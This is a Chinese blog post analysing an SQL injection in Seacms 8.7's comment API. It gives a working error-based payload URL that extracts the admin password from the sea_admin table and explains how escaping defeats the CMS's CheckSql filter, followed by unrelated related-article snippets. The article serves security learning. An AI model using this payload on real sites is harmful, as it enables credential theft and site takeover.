sql return的用法_【实用技能】Seacms 8.7版本SQL注入分析

最新推荐文章于 2024-07-19 02:25:25 发布
最新推荐文章于 2024-07-19 02:25:25 发布
阅读量245 收藏
点赞数
文章标签: sql return的用法 sql string 转date

有些小伙伴刚刚接触SQL编程,对SQL注入表示不太了解。其实在Web攻防中,SQL注入就是一个技能繁杂项,为了帮助大家能更好的理解和掌握,今天小编将要跟大家分享一下关于Seacms 8.7版本SQL注入分析的内容,一定要认真学习哦。

38b7a9ff83ed27785d37da53401646fa.png

0x01环境

Web:phpstudy and MAMP

System:Windows 7 X64 and MacOSBrowser:Firefox Quantum and ChromeMySQL:5.5php:5.4

0x02漏洞详情

漏洞复现

payload:

http://10.211.55.4/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`
12cf7db8df3c68269c149d5940a0ffb4.png

漏洞分析

之前在MySQL 5.6、5.7上面复现都不成功,因为这两个版本用extractvalue( )、updatexml( )报错注入不成功,后来换了系统Linux和Windows还有macOS来测试也是一样,和PHP、Apache的版本没有影响,还是MySQL的版本问题,所以大家测试的时候注意一下版本。

漏洞文件是在:comment/api/index.php

<?phpsession_start ();require_once("../../include/common.php");$id = (isset($gid) && is_numeric($gid)) ? $gid : 0;$page = (isset($page) && is_numeric($page)) ? $page : 1;$type = (isset($type) && is_numeric($type)) ? $type : 1;$pCount = 0;$jsoncachefile = sea_DATA."/cache/review/$type/$id.js";//缓存第一页的评论if($page<2){        if(file_exists($jsoncachefile))        {                $json=LoadFile($jsoncachefile);                die($json);        }}$h = ReadData($id,$page);$rlist = array();if($page<2){        createTextFile($h,$jsoncachefile);}die($h);        function ReadData($id,$page){        global $type,$pCount,$rlist;        $ret = array("","",$page,0,10,$type,$id);        if($id>0)        {                $ret[0] = Readmlist($id,$page,$ret[4]);                $ret[3] = $pCount;                $x = implode(',',$rlist);                if(!empty($x))                {                $ret[1] = Readrlist($x,1,10000);                }        }                $readData = FormatJson($ret);        return $readData;}function Readmlist($id,$page,$size){        global $dsql,$type,$pCount,$rlist;        $ml=array();        if($id>0)        {                $sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";                $rs = $dsql ->GetOne($sqlCount);                $pCount = ceil($rs['dd']/$size);                $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";                $dsql->setQuery($sql);                $dsql->Execute('commentmlist');                while($row=$dsql->GetArray('commentmlist'))                {                        $row['reply'].=ReadReplyID($id,$row['reply'],$rlist);                        $ml[]="{"cmid":".$row['id'].","uid":".$row['uid'].","tmp":"","nick":"".$row['username']."","face":"","star":"","anony":".(empty($row['username'])?1:0).","from":"".$row['username']."","time":"".date("Y/n/j H:i:s",$row['dtime'])."","reply":"".$row['reply']."","content":"".$row['msg']."","agree":".$row['agree'].","aginst":".$row['anti'].","pic":"".$row['pic']."","vote":"".$row['vote']."","allow":"".(empty($row['anti'])?0:1)."","check":"".$row['ischeck'].""}";                }        }        $readmlist=join($ml,",");        return $readmlist;}function Readrlist($ids,$page,$size){        global $dsql,$type;        $rl=array();        $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";        $dsql->setQuery($sql);        $dsql->Execute('commentrlist');        while($row=$dsql->GetArray('commentrlist'))        {                $rl[]=""".$row['id']."":{"uid":".$row['uid'].","tmp":"","nick":"".$row['username']."","face":"","star":"","anony":".(empty($row['username'])?1:0).","from":"".$row['username']."","time":"".$row['dtime']."","reply":"".$row['reply']."","content":"".$row['msg']."","agree":".$row['agree'].","aginst":".$row['anti'].","pic":"".$row['pic']."","vote":"".$row['vote']."","allow":"".(empty($row['anti'])?0:1)."","check":"".$row['ischeck'].""}";        }        $readrlist=join($rl,",");        return $readrlist;}

传入$rlist的值为我们构造的SQL语句:

@`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select (password)from sea_admin))),@`'`

通过ReadData函数,implode处理后传入Readrlist函数。

可以看到执行的SQL语句是:

e145a2687e1d625916ff0190601a951e.png

它在$dsql->Execute('commentrlist');这句的时候会有一个SQL的安全检测。

文件在include/sql.class.php的CheckSql函数

//完整的SQL检查        while (true)        {                $pos = strpos($db_string, ''', $pos + 1);                if ($pos === false)                {                        break;                }                $clean .= substr($db_string, $old_pos, $pos - $old_pos);                while (true)                {                        $pos1 = strpos($db_string, ''', $pos + 1);                        $pos2 = strpos($db_string, '', $pos + 1);                        if ($pos1 === false)                        {                                break;                        }                        elseif ($pos2 == false || $pos2 > $pos1)                        {                                $pos = $pos1;                                break;                        }                        $pos = $pos2 + 1;                }                $clean .= '$s$';                $old_pos = $pos + 1;        }        $clean .= substr($db_string, $old_pos);        $clean = trim(strtolower(preg_replace(array('~s+~s' ), array(' '), $clean)));

可以看到这里没有把我们的报错函数部分代入进去,如果代入进去检测的话就会在这里检测到:

9de5cdac287218e7f4f21763f5170be0.png
7599270ca10bfbb69615787d49de22fa.png

后面$clean就是要送去检测的函数,通过一番处理后得到的值为:

b1c542792f33b804224dfb0a63e7116d.png

后面返回来执行的SQL语句还是原样没动

cb7aae7dc649b77b05855183728153ce.png

以上基本分析就完成了。

最终执行的语句:

SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=1 AND id in (@`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select (password)from sea_admin))),@`'`) ORDER BY id DESC

还有一些问题就是构造语句的问题。

刚开始传入的%27后面怎么变成了转义后的单引号?

require_once("../../include/common.php");就包含了这个文件,里面有一个_RunMagicQuotes函数,如果PHP配置没有开启get_magic_quotes_gpc就会用到这个函数,这个函数是把值经过addslashes函数的处理。此函数的作用是为所有的 ' (单引号), " (双引号), (反斜线) and 空字符和以会自动转为含有反斜线的转义字符。

所以后面的SQL语句就会加上转义符号,然后经过CheckSql函数的时候就绕过了对报错语句的检测。

function _RunMagicQuotes(&$svar){        if(!get_magic_quotes_gpc())        {                if( is_array($svar) )                {                        foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);                }                else                {                        $svar = addslashes($svar);                }        }        return $svar;}

为什么要加上``两个反引号和@?

因in在MySQL里面用法是:

1f3dbac7e811644a5a8f6c0db0cf653e.png

value1必须是一个值,整数型或者文本型都可以,如果用单引号的话就会变成三个转义'''

在MySQL上面是作为一个转义符号来使用,一般为了不让和系统的变量冲突所以使用,一般在数据库名、表名、字段名使用,所以这里用@来使这个成为一个变量类型。

后记

在6.53的版本中include/common.php中的44-47行接收到变量:

foreach(Array('_GET','_POST','_COOKIE') as $_request){        foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);}

但是在75行这里又重新赋值了:

require_once(sea_DATA."/config.cache.inc.php");
15cccee31e5ebb60533edbf05f1461fd.png

以上是今天的全部内容,大家学会了吗?

weixin_39673051
关注
网络安全- 实战篇 技能提升丨Seacms 8.7版本SQL注入分析
Coisini的博客
05-30 508
有些小伙伴刚刚接触SQL编程,对SQL注入表示不太了解。其实在Web攻防中,SQL注入就是一个技能繁杂项,为了帮助大家能更好的理解和掌握,今天小编将要跟大家分享一下关于Seacms 8.7版本SQL注入分析的内容,一定要认真学习哦。 0x01环境 Web:phpstudy and MAMP System:Windows 7 X64 and MacOS Browser:Firefox Quantu...
php8.7 入侵管理员密码,phpwind 8.3~8.7 重要安全漏洞补丁发布
weixin_39717367的博客
03-13 861
PHPWind v8.7刚刚发布不久,日前PHPWind官网就发现了PHPWind 8.3~8.7全系高等级安全漏洞,并发布相应的安全补丁,用户可自行修改文件,或者下载补丁文件覆盖网站。补丁名称:phpwind 8.3~8.7bata 安全补丁(更新时间20110826)影响版本:PW8.3 PW8.5 PW8.7bata涉及文件:/lib/utility/querybuilder.class.p...
sqlreturn用法,在C#中调用带有return值的存储过程
12-18
结构化查询语言sqlreturn用法,在C#中调用带有return值的存储过程
技能提升丨Seacms 8.7版本SQL注入分析
dfdhxb995397的博客
04-02 327
有些小伙伴刚刚接触SQL编程,对SQL注入表示不太了解。其实在Web攻防中,SQL注入就是一个技能繁杂项,为了帮助大家能更好的理解和掌握,今天小编将要跟大家分享一下关于Seacms 8.7版本SQL注入分析的内容,一定要认真学习哦。 0x01环境 Web:phpstudy and MAMP System:Windows 7 X64 and MacOS Browser...
SQL 流程控制语句 之五 RETURN语句介绍
对象本无根,类型亦无形。本来无一物,何处惹尘埃
07-10 1878
SQL 流程控制语句 之五 RETURN语句介绍 一、RETURN语句例子:  WAITFOR delay 00:00:01 Select * from titlesreturnselect * from publishers 二、RETURN语句  语法RETURN语句用于无条件地终止一个查询、存储过程或者批处理,此时位于RETURN语句之后的程序将不会被
sql 将字符串换为日期
最新发布
weixin_41292640的博客
07-19 1287
SQL 中,将字符串换为日期(或时间戳)是一个常见的需求,这通常涉及到使用特定的日期函数或换函数,具体取决于你使用的数据库系统。以下是在一些流行的数据库系统中将字符串换为日期的示例:MySQL:使用STR_TO_DATE函数。登录后复制 SELECT STR_TO_DATE('2023-10-23', '%...
Stringsql.Datesql.Time
weixin_45920385的博客
11-21 2417
Stringsql.Datesql.Time String类型换成java.sql.Date类型不能直接进行换,首先要将String换成java.util.Date,在化成java.sql.Date public static java.sql.Date strToDate(String str) throws ParseException { SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd"); /
达梦数据库_SQL语言手册
12-09
### 达梦数据库(SQL语言手册)关键知识点概览 #### 1. 结构化查询语言DM_SQL简介 ##### 1.1 DM_SQL语言的特点 - **兼容性**: DM_SQL兼容SQL标准,支持ANSI SQL92 Entry Level以及部分扩展。 - **易用性**: 提供了...
SQL Server2005基础教程
07-10
 8.7 使用SSMS检索数据  8.8 SELECT语句  8.9 指定列  8.10 第一批搜索  8.11 改变输出的显示  8.12 限制搜索:WHERE的使用  8.13 字符串函数  8.14 顺序!顺序!  8.15 LIKE运算符  8.16 生成...
GBase 8s SQL 指南:教程———12 创建和使用SPL例程
aisirea的博客
04-11 1153
本部分描述如何创建和使用SPL例程。SPL例程是以GBase 8s "存储过程语言”(SPL) 编写的用户定义的例程。GBase 8s SPL是提供流控制的SQL的扩展,诸如循环和分支。 在数据库上有Resource权限的任何人都可创建SPL例程。 尽可能地解析和优化以SQL编写的例程,然后以可执行的格式存储在系统目录表中。对 于SQL密集的任务,SQL例程可能是一个好的选择。SPL例程可执行以C或其他外部 语言编写的例程,且外部的例程可执行SPL例程。 您可使用SPL例程来执行您可以SQL执行的任何.
string类型的时间换成SQL date
沉睡的鱼
01-16 1219
[size=medium][color=indigo]// 将string类型的时间换成SQL date 型 public Date dateChange(String date1) { SimpleDateFormat sdf =new SimpleDateFormat("yyyy-MM-dd"); java.util.Date cDate; Date...
sqldatestring
weixin_34075268的博客
03-27 3083
涉及的函数 date_format(date, format) 函数,MySQL日期格式化函数date_format() unix_timestamp() 函数 str_to_date(str, format) 函数 from_unixtime(unix_timestamp, format) 函数,MySQL时间戳格式化函数from_unixtime 时间字符串 ...
MssqlReturn用法
weixin_30362801的博客
02-12 353
实际上,无论是否指定返回值,程序都会返回一个值。默认时,在存储过程完成时,SQL Service会自动返回一个值0. 要从存储过程向调用它的代码返回值,可以简单的使用return语句 return[<返回整数值>] 注意返回值一定是整数 关于return语句,也许我们最了解的就是它在存储过程中无条件的退出。无论在存储过程中的什么位置,只要调用return语句,其后的所有代码都不...
sql return用法_MyBatis XML方式的基本用法之增删改
weixin_39582656的博客
12-01 179
# insert用法1 简单的insert方法假如现在我们想新增一个用户,该如何操作呢?首先,在接口SysUserMapper中添加如下方法。/** * 新增用户 * * @param sysUser * @return */int insert(SysUser sysUser);然后打开对应的SysUserMapper.xml文件,添加如下语句。<insert id="inser...
C#获得sql存储过程return返回的值和返回参数返回的值
nutian的专栏
10-30 6286
下面的CmdObj.是定义的SqlCommand对象1、获得存储过程中return语句返回的整个存储过程函数的返回值://获得存储过程return的值,定义一个参数,指明其作用是接受return的值    CmdObj.Parameters.Add("RETURN_VALUE", SqlDbType.Int).Direction =ParameterDirection.ReturnValu
sqlreturnreturns的区别
weixin_30783629的博客
07-10 3978
用户定义函数中,用RETURNS 子句指定该函数返回值的数据类型 return用于返回具体的值/值变量 载于:https://www.cnblogs.com/lfq2011/archive/2009/05/15/1457646.html...
sqlreturn/break/continue解释
wozengcong的专栏
05-12 4088
sqlreturn/break/continue解释 2016-07-20 11:12:28 一,return:从查询或过程中无条件退出。可在任何时候用于从过程、批处理或语句块中退出。RETURN 之后的语句是不执行的。 1,如果用于存储过程,RETURN 不能返回空值。如果强制返回则:将生成警告消息并返回 0 值。 2,RETURN 语句无条件终止查询、存储过程或批处理。存储过程或批处理中 RETURN 语句后面的语句都不执行。 二,break:退出 WHILE 或 I...
SQL server 中 return,break和continue的使用及例子
热门推荐
数据分析
05-06 1万+
1、continue: 重新开始 WHILE 循环。在 CONTINUE 关键字之后的任何语句都将被忽略。 例子:计算1-10的偶数和 DECLARE @SUM INT, @I INT SET @SUM=0 SET @I =1 WHILE (@I &lt;=10) BEGIN IF (@I % 2 =1) BEGIN ...
MySQL SQL注入:information_schema数据库的利用与解析
"本文深入探讨了information_schema数据库在SQL注入攻击中的应用,特别是在MySQL环境下的重要性。这个系统数据库包含了MySQL服务器内所有数据库、表和列的详细信息,为攻击者提供了一个宝贵的工具来获取和利用数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值